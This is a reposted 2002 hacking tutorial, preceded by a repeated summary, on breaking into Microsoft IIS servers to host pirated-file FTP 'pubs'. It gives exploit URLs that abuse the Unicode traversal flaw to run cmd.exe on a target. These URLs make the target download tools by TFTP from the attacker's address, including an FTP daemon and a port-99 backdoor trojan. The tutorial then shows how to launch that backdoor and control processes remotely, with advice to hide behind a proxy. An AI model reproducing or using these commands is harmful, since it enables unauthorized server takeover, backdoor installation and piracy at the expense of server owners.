This document provides instructions for hacking IIS servers using exploits and establishing a pub on the compromised server. It outlines the required tools, including Serv-U FTP Server and TFTPSuitePro2000. It then details the steps to find a vulnerable server, upload hacking tools using TFTP, and execute programs to fully take control of the system and establish an FTP server pub. The document warns that these activities are illegal and users take full responsibility for their actions.
This document provides instructions for hacking IIS servers using exploits and establishing a pub on the compromised server. It outlines the required tools, including Serv-U FTP Server and TFTPSuitePro2000. It then details the steps to find a vulnerable server, upload hacking tools using TFTP, and execute programs to fully take control of the system and establish an FTP server pub. The document warns that these activities are illegal and users take full responsibility for their actions.
Original Description:
This is a part of an hack serie. Retired from The Onion Router.
This document provides instructions for hacking IIS servers using exploits and establishing a pub on the compromised server. It outlines the required tools, including Serv-U FTP Server and TFTPSuitePro2000. It then details the steps to find a vulnerable server, upload hacking tools using TFTP, and execute programs to fully take control of the system and establish an FTP server pub. The document warns that these activities are illegal and users take full responsibility for their actions.
This document provides instructions for hacking IIS servers using exploits and establishing a pub on the compromised server. It outlines the required tools, including Serv-U FTP Server and TFTPSuitePro2000. It then details the steps to find a vulnerable server, upload hacking tools using TFTP, and execute programs to fully take control of the system and establish an FTP server pub. The document warns that these activities are illegal and users take full responsibility for their actions.
Download as TXT, PDF, TXT or read online from Scribd
Download as txt, pdf, or txt
You are on page 1of 6
The How-To Hack IIS Servers For Pubstros
Tutorial about Hacking using IIS exploits
This one goes for the people that ask for a tut to start hacking. if u wanna know more research yourself Pub Hacking Tutorial The How-To Hack IIS Servers For Pubstros (By GENERAL NEWBIE) March 20 ,2002 #################################################F or Educational Use Only############################################## ##### Getting Started is simple... let me warn you that what your doing is illegal and dangerous. Now then This tutorial tells you how to hack IIS servers and make them as a pub... and ho w to rehack someone elses pub hahahahaha! Now then the tools and knowledge you will need are as follows Tools Required: 1. Serv-u Ftp Server 4.0 works just fine but versions 3.0 doesnt require an addi tional dll file 2. TFTPSuitePro2000 (h**p://www.walusoft.co.uk/software/tftppro.exe) 3. Your Brain with knowledge of the IIS Unicode Exploit or MSDAC Exploit 4. Internet Explorer 5. Other things to try Ok Let Me Start By Saying This Is For Education Purpouses Only And I Take No Respo nsibility For What You Do The Setup Step 1: Install Serv-u AND download the already preconfigured ServuDaemon from m e (recommended as i will be explaining from this) The reason why i told you to download both is because the Servu Version 4 that y ou download has a admin program so you can make your own ini file after you understand everything i have in mine. Step 2: Install TFTPSuite (Durring Installation Pick SERVER) TFTPSuitePro Setup Open TFTPSuitePro, When It Asks U To Register Hit Register Th an Cancel.You Should Have Sumtin That Looks Like This Hit System->Setup For Inbound Path File, Hit Browse And Pick The C:\FT P dir We Made, And Do The Same For Outbound Then Hit Ok. Now then when its time to upload files TFTP SERVER MUST BE RUNNING Step 3: Unzip the Zip/Rar where you will find some goodies to help you scan for IIS servers and find one to hack Here you will find tons of little programs that will assist you in hacking your server. Step 4: FIND A VERNURABLE SERVER Step 5: Start Making the Pub Ok im assuming you have a host that you can maybe get away with uploading files to.. and i say this because some networks are behind firewalls that dont allow TFTP to connect to outside host and estabis h a connection. Thus even though you can use the unicode exploit on it to view all the files still doesnt mean yo u can upload files to it.. PLus some host administrators make it so that you cant write to the HD... GOOD L UCk THERE Starting To THE HACK FIRST BEFORE YOU DO THIS BE SURE TO USE A PROXY !!!!!!!!!!!!!!!! The Right Side, You Should Be At A Directory Listing In Internet Explorer.The Di r Should Look Like This : h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+d ir+c:\ <----- This line wi ll vary Directory of c:\ 07/17/02 12:17a 1,000,000 ---=1Mb=--- 05/03/02 08:57a 0 AUTOEXEC.BAT 05/03/02 08:54a 0 AUTOEXEC.CAM 06/01/01 09:09a 0 CONFIG.SYS 12/26/01 12:46p <DIR> Desktop 06/01/01 02:20p <DIR> I386 07/08/02 02:52p <DIR> intepub 06/01/01 02:49p <DIR> NIC 12/23/01 08:32p <DIR> NIMDA TO 12/23/01 08:32p <DIR> Nimda Tool 07/17/02 05:56p 65,634,304 pagefile.sys 01/04/02 04:31p <DIR> Program Files 07/17/02 12:14a <DIR> TEMP 06/05/01 05:01p <DIR> temptape 06/01/01 04:53p <DIR> Video 12/23/01 09:53p <DIR> Windows Update Setup Files 07/17/02 05:50p <DIR> WINNT 19 File 72,687,972 bytes 480,750,592 bytes free Ok you get the idea of what your browser looks like because your experienced but you are clueless about this pub crap Now then you will need to start and run TFTP SERVER making sure you arent runnin g and firewall because it will block your request.Now we will need to send the files through the TFTP Server to the h ost. And to do this you do something like h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+c :\winnt\system32\tftp.exe+ "-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe Now then you arent limited to just 1 dir to install this server to.. i like to h ide mine in the c:\winnt\system but some people use the c:\intepub\scripts h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+c :\winnt\system32\tftp.exe+ "-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe So then you would copy the above line into the Internet Explorer And Hit Enter, Look At Your TFTPSuitePro Window And u Should See Its Uploading A File. NOTE SOMETIMES you get an error msg just refresh the page or..copy into another window and try again remember sometimes you get this msg because the host cant connect properly to yo u.. Repeat for the following files: SFIND.exe -------> used to scan for more.. servers KILL.EXE -------> used to kill a task very handy TLIST.EXE -------> used to list all running processes or Task List ncx99.exe -------> used to have as a backdoor remote trojan that runs on port 99
iis-scanner.EXE great for scanning servers servudaemon.ini needed for servu HOW THE UPLOAD FILES SHOULD LOOK gave 2 examples h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Ser vUDaemon.ini+c:\winnt\system\ServUDaemon.ini h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Ser vUDaemon.exe+c:\winnt\system\ServUDaemon.exe h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Ser vUDaemon.ini+c:\inetpub\scripts\ServUDaemon.ini h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Ser vUDaemon.ini+c:\inetpub\scripts\ServUDaemon.exe h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Tzo Libr.dll+c:\winnt\system\TzoLibr.dll h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+ncx 99.exe+c:\winnt\system\ncx99.exe h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+bnc .cfg+c:\winnt\system\tlist.exe EXCUTE PROGRAMS h**p://www.target.com/scripts/..%25...md.exe?/c+call+ c:\winnt\system\ncx99.exe h**p://www.target.com/scripts/..%25...md.exe?/c+start +c:\winnt\system\ncx99.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+c:\nc x99.exe%20/h After the file has been executed The Ftp Should Be Up! Test It With The Server Ip/Port/L/p You Setup Back In Servu Ftp Settings. If It Works You Now Have Complete Control Over The System! Now then here is where the Serv U 4.0 comes in you may now use the admin program that comes with it so that you can set up your server the way you want. You have Admin rights Other Shit How To Use 'Kill' And 'Tlist' and 'ncx99.exe' Tlist = Lists All Running Programs On Remote Machine Kill = Kills Ones U Specicify ncx99.exe = Dos like trojan How to use ncx99 C:\>telnet host 99 Then once you connect to your server you will see dos like enviroment so find wh ere you uploaded tlist.exe and execute it c:\> cd winnt c:\>winnt\ cd system c:\>winnt\system\tlist.exe Tlist is good when you have ncx99.exe installed so its easier to just call it up
c:\>winnt\system\tlist.exe -2 Idle.exe 4 System.exe 840 smss.exe 948 csrss.exe 972 winlogon.exe NetDDE Agent 1016 services.exe 1028 lsass.exe 1216 svchost.exe 1364 svchost.exe 1500 svchost.exe 1636 svchost.exe 1820 spoolsv.exe 1952 CTSVCCDA.exe 1988 mdm.exe 2024 DUC20.exe Duc20 408 MsPMSPSv.exe 3024 svchost.exe 360 explorer.exe Program Manager 3496 ctfmon.exe CiceroUIWndFrame 3068 WinCinemaMgr.exe InterVideo WinCinema Manager 1124 evntsvc.exe Notification Wnd for RNAdmin 1568 msmsgs.exe DDE Server Window 2664 iis-scanner.exe Notification Window 2172 r_server.exe 3712 daemon.exe 2800 cmd.exe Command Prompt 3880 TLIST.exe -2 _Total.exe now then to kill it there are two ways i will show you the first is from within the nxc99.exe because its best just look at the tlist.exe list and find the system process you want to kill now from the same dir that you installed kill run kill and for me it would be c:\>winnt\system\kill.exe now then lets say i wanted to close explorer.exe i look at the tlist and see tha t '360 explorer.exe' Program Manager 360 is the process id that you will use to close down Explorer.exe so you call i t like this c:\>winnt\system\kill.exe 360 do another tlist.exe and you will no longer see explorer.exe there the other way to do this is to use the url h**p://www.target.com/scripts/..%25...md.exe?/c+start +c:\winnt\system\kill.exe? number where number is again from the tlist.exe so to kill explorer.exe we do something like this h**p://www.target.com/scripts/..%25...md.exe?/c+start +c:\winnt\system\kill.exe? 360 and it should say killed.